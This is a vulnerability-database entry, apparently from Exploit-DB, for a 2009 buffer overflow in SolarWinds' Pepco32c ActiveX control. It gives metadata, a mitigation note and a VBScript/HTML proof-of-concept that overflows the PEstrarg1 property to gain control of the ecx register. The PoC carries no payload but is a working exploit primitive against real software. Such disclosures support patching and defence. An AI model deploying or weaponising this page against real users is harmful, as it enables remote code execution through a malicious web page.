Vendor: Server and Application Monitor ActiveX
By: Blake
CVSS: 7.5 (HIGH)
Type: Buffer Overflow
CWE: 119
Product Name: Server and Application Monitor ActiveX
Affected Version From: 6.0
Affected Version To: 6.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:solarwinds:server_and_application_monitor_activex:6.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 2003 SP2 / IE
2009

SolarWinds Server and Application Monitor ActiveX (Pepco32c) Buffer Overflow

A buffer overflow vulnerability exists in SolarWinds Server and Application Monitor ActiveX (Pepco32c) due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability by crafting a malicious web page and convincing a user to view it, resulting in arbitrary code execution in the context of the user.

Mitigation:

Upgrade to the latest version of SolarWinds Server and Application Monitor ActiveX (Pepco32c)

Exploit-DB raw data:

<html>
<!--
SolarWinds Server and Application Monitor ActiveX (Pepco32c) Buffer Overflow
Vendor: SolarWinds
Version: 6.0
Tested on: Windows 2003 SP2 / IE
Download: http://www.solarwinds.com/downloads/
Author: Blake

CLSID: 8AE9F829-D587-42BB-B5C1-09EE8D9547FA
Path: C:\Program Files\Common Files\SolarWinds\Pepco32c.ocx
Member Name: PEstrarg1
Progid: PEPCO32CLib.Pepco
Safe for Scripting: False
Safe for Initialization: False
Kill Bit: False
-->

<object classid='clsid:8AE9F829-D587-42BB-B5C1-09EE8D9547FA' id='target' ></object>
<script language='vbscript'>

' 132 bytes in we control ecx before the call ecx instruction

buffer = String(132, "A")
ecx = String(4, "B")
junk = String(3086, "C")
arg1 = buffer + ecx + junk

target.PEstrarg1 = arg1

</script>